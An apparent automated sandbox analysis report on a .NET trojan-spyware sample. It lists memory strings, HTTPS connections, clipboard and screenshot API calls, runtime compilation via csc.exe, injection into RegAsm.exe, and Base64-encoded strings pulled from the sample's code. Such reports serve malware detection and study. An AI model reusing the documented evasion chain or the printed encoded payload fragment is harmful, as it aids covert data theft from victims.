Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;Persist#
Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49715 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_0042DFD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

5_2_0042DFD0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_0042DFD0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

5_2_0042DFD0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_0042E923 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

5_2_0042E923

System Summary

.NET source code contains very large strings

Source: nlJ2sNaZVi.exe, Iceberg.cs

Long String: Length: 18812

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004180C0	5_2_004180C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004328D0	5_2_004328D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043C0F0	5_2_0043C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0040D922	5_2_0040D922
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00409A40	5_2_00409A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00427A08	5_2_00427A08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00410214	5_2_00410214
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00408AF0	5_2_00408AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043CB60	5_2_0043CB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042730E	5_2_0042730E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042731B	5_2_0042731B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0040B320	5_2_0040B320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043BBF0	5_2_0043BBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041CC70	5_2_0041CC70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00432550	5_2_00432550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041ADF0	5_2_0041ADF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00421640	5_2_00421640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0040AE60	5_2_0040AE60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00413F3B	5_2_00413F3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0040CFFF	5_2_0040CFFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041E7B0	5_2_0041E7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00406840	5_2_00406840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042D07E	5_2_0042D07E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043A020	5_2_0043A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004330D0	5_2_004330D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00422885	5_2_00422885
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004210B0	5_2_004210B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043A8B0	5_2_0043A8B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00424166	5_2_00424166
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00413970	5_2_00413970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00421174	5_2_00421174
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042D920	5_2_0042D920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004201F3	5_2_004201F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00404990	5_2_00404990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004061A0	5_2_004061A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004231A8	5_2_004231A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00422A5B	5_2_00422A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041FA5D	5_2_0041FA5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00411260	5_2_00411260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043AA00	5_2_0043AA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00421AD0	5_2_00421AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00417AF8	5_2_00417AF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043AB50	5_2_0043AB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00419B60	5_2_00419B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00416367	5_2_00416367
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00402B70	5_2_00402B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00431379	5_2_00431379
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00428379	5_2_00428379
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00439B00	5_2_00439B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043B330	5_2_0043B330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00421174	5_2_00421174
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00431BE0	5_2_00431BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042DBB0	5_2_0042DBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004233B0	5_2_004233B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00410C59	5_2_00410C59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00428459	5_2_00428459
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043C460	5_2_0043C460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042840A	5_2_0042840A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004364D0	5_2_004364D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00420CDA	5_2_00420CDA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00414CDC	5_2_00414CDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00406CE0	5_2_00406CE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00405CE0	5_2_00405CE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00435CE0	5_2_00435CE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00426CF3	5_2_00426CF3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004154F6	5_2_004154F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00427D4F	5_2_00427D4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043AD30	5_2_0043AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00427D36	5_2_00427D36
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042D536	5_2_0042D536
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042DDD0	5_2_0042DDD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043BDD0	5_2_0043BDD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0041DDFF	5_2_0041DDFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00403580	5_2_00403580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00409590	5_2_00409590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00431E40	5_2_00431E40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00433669	5_2_00433669
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00419E20	5_2_00419E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042B6C2	5_2_0042B6C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042BED0	5_2_0042BED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00423710	5_2_00423710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0042AF2B	5_2_0042AF2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_00403F30	5_2_00403F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004027C0	5_2_004027C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_0043C7D0	5_2_0043C7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 5_2_004077F0	5_2_004077F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004082E0 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00413520 appears 61 times

Source: nlJ2sNaZVi.exe, 00000000.00000000.2018923511.0000000000B8E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameGlobally.exe: vs nlJ2sNaZVi.exe
Source: nlJ2sNaZVi.exe, 00000000.00000002.2052624762.0000000003034000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamev0t1l0co.dll4 vs nlJ2sNaZVi.exe
Source: nlJ2sNaZVi.exe, 00000000.00000002.2052585783.0000000002E70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamev0t1l0co.dll4 vs nlJ2sNaZVi.exe
Source: nlJ2sNaZVi.exe, 00000000.00000002.2051982616.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs nlJ2sNaZVi.exe
Source: nlJ2sNaZVi.exe	Binary or memory string: OriginalFilenameGlobally.exe: vs nlJ2sNaZVi.exe

Source: nlJ2sNaZVi.exe, Iceberg.cs	Base64 encoded string: 'RjBVY2FBVVdNVThSRmxNWVBXODhGMFVMREZGVlZSdEZGbE1QVEhJY1p3VllEVVVXQzFVR1BXODhGMFVMREZGVlZSdEZGbE1QVEdRQWFCWmZEMU5NSzFnQll4QlpFbVVIRUVBY1pRZEZXVHRvYnp3RmN3QmFDMVZDQVZvVWRSRVdKMWdGQzFnUVl4QkZiendaYnp4VkprSVdRVVFIQlY4YWFFSjFEVmdVQjBRR2J3MVlMMU1XQ2xrUmRXODhRaFpDUWtZQVpBNWZBUllSRmxjQmJ3RVdLMWdXVXdCVlJRMVlGRk1RRm1JYVR3eENVd0JLQUU4Qll6bHJRa0FERGtNUUtrSmZERUpDRVVJVWRCWi9ERklIR2g5NERFSVdRaFlaYnp4VkprSVdRaFpDUWtRUWNoZEVEQllnQzBJMmFReEFCMFFXQjBSYlVnMS9ERUpUVkI0RFp3NURCeHBDRVVJVWRCWi9ERklIR2g5T0MyZ1dRaFpDSHp0L0MyZ1dRaFpDRWtNWGFndFZRa1VXQTBJY1pVSi9ERUpSVUJZMmFReEFCMFFXTmxrOGFCWUZVQjRBRzBJUVhUOFdGRmNPRjFOWkpndFlGaFlSRmxjSGNpdFlCbE1hU3p0L0prSVdRazF2YUJaVkprSVdRaFpDRUZNQmN4QllRblFMRm5VYWFCUlRFRUlIRUJnaGFTdFlGZ1ZRU2tBVWFoZFRUaFlSRmxjSGNpdFlCbE1hU3cxNERFSVdRaFlmYnp4NERFSVdRaFlTRjFRWmJ3RVdFVUlERmw4V0pnQlBGbE01UHhZMmFReEFCMFFXTmxrM2Z4WlRFUjRMREVKVmNBTmFGMU5MYnp4VkprSVdHVHRvUWhaVkprSVdRaFlRQjBJQWRBd1dJRjhXSVZrYmNBZEVGbE1RVEhFUWNpQlBGbE1SU2tBVWFoZFRTdzF2YUJaVkprSkxienhDUWhaVkpRZFlCa1FIQlY4YWFHODhienhDUWhaVkpSQlRCVjhOREJZMGRndDRBMXNIRVR0L0prSVdRa1lYQUZvY1pVSkZGbGNXQzFWVmRSWkVDMWdGT1d0VlFRZENJMFlMTEZjWVl4RWVTenRvUWhaVkpoazdhQlpDUWhaVkprSVdFRk1XRjBRYkpneFRGUllSRmtRY2FBVnRQenRvUWhaVkprSVdRaFlaYnp4VkprSVdRaFpDUWhaVkprSVVDVk1RREZNWk5WQVVUanRvUWhaVkprSVdRaFpDUWhaVkpBeENCbG9PUUJwNERFSVdRaFpDUWhaVkprSVdRaFF3QjBVQWF3ZGlDa1FIQTFKWEttODhRaFpDUWhaVkprSVdRaFpDUUdFYWNWUUNNVk1XTmw0SFl3TlNJVmtNRmxNTmNrQWFienhDUWhaVkprSVdRaFpDUWhaWFZRZENObDRRQjFjUlJRMVlGbE1hRmhSWkMyZ1dRaFpDUWhaVkprSVdRaFpBTlZrQ01GWnhCMEkyQ2tRUVp3WjFEVmdXQjA0QkpFNDdhQlpDUWhaVkprSVdRaFpDUWhReVl4WmlDa1FIQTFJMmFReENCMDRXUUJwNERFSVdRaFpDUWhaVkprSVdRaFEwQzBRQmN3TmFJMW9PRFZVd2ZrQWFienhDUWhaVkprSVdRaFpDUWhaWFVSQmZGbE15RUZrV1l4RkZMMU1QRFVRTUpFNDdhQlpDUWhaVkprSVdRaFpDUWhRbll3TlNNa1FOQVZNR2RTOVREMWtRR3hSWkMyZ1dRaFpDUWhaVkprSVdRaFpBT0VFZ2FBOVhFbUFMQjBFNllERlRBVUlMRFZoWEttODhRaFpDUWhaVkprSVdRaFpDUUhVSFl3TkNCMllRRFZVUWRSRjNRRHRvUWhaVkprSVdRaFlmV1R0L0prSVdRa3R2YUJaVkprSVZCMWdHRUZNU2J3MVlienh2YUJaVkprSVZFRk1GQzFrYkppTkdDM0lIRGxNU1p4WlRFVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbVFIRVVNWVl6WmVFRk1EQm5JUWFnZFJBMElIU244YmNqSkNFQllLQTFnUmFnY2ZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFl4QjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdNVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVlpBMVpEaFlsQjBJaWFSVUFWbUlLRUZNVVlpRlpERUlIR2tJeFl3NVRCVmNXQng0OGFCWm1Ga1JDRmw0SFl3TlNUaFlMREVJdVcwSlZEVmdXQjA0QkwxazdhQlpDUWhZRmRBdEFBMElIUWxJUWFnZFJBMElIUWxRYWFRNFdKVk1XTmw0SFl3TlNJVmtNRmxNTmNpWlREbE1GQTBJUUxpdFlGbVlXRUJZQmJoQlRBMUpPUWw4YmNqbHJRbFVOREVJUWZoWWZXVHRvUWhaVkpoSkVDMEFERmxOVllnZGFCMUVERmxOVmJ3eENRbUFMRUVJQVp3NTNEbG9OQVhNTlFnZGFCMUVERmxOZFR3eENNa0lRUWw0VWFBWmFCeHBDQzFnQkpnTlNCa1FIRVVWWkpndFlGaFlPQjFnU2Nnb2FRbDhNRmhZQmZ4SlRUaFlMREVKVmRoQlpGbE1CRmg5T0MyZ1dRaFpDRWtRY2NBTkNCeFlHQjFvUVlRTkNCeFlBRFZrWkpqVkVDMElITDFNWWFSQlBKbE1PQjFFVWNnY2VLMWdXTWtJSEp
Source: nlJ2sNaZVi.exe, Tp.cs	Base64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@8/7@11/3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_004328D0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

5_2_004328D0

Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nlJ2sNaZVi.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6568:120:WilError_03

Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe

File created: C:\Users\user\AppData\Local\Temp\v0t1l0co

Jump to behavior

Source: nlJ2sNaZVi.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: nlJ2sNaZVi.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: nlJ2sNaZVi.exe

ReversingLabs: Detection: 55%

Source: unknown	Process created: C:\Users\user\Desktop\nlJ2sNaZVi.exe "C:\Users\user\Desktop\nlJ2sNaZVi.exe"
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBEB5.tmp" "c:\Users\user\AppData\Local\Temp\v0t1l0co\CSC65BF410C392B47AC8396E849E0F657FD.TMP"
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBEB5.tmp" "c:\Users\user\AppData\Local\Temp\v0t1l0co\CSC65BF410C392B47AC8396E849E0F657FD.TMP"	Jump to behavior

Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\nlJ2sNaZVi.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
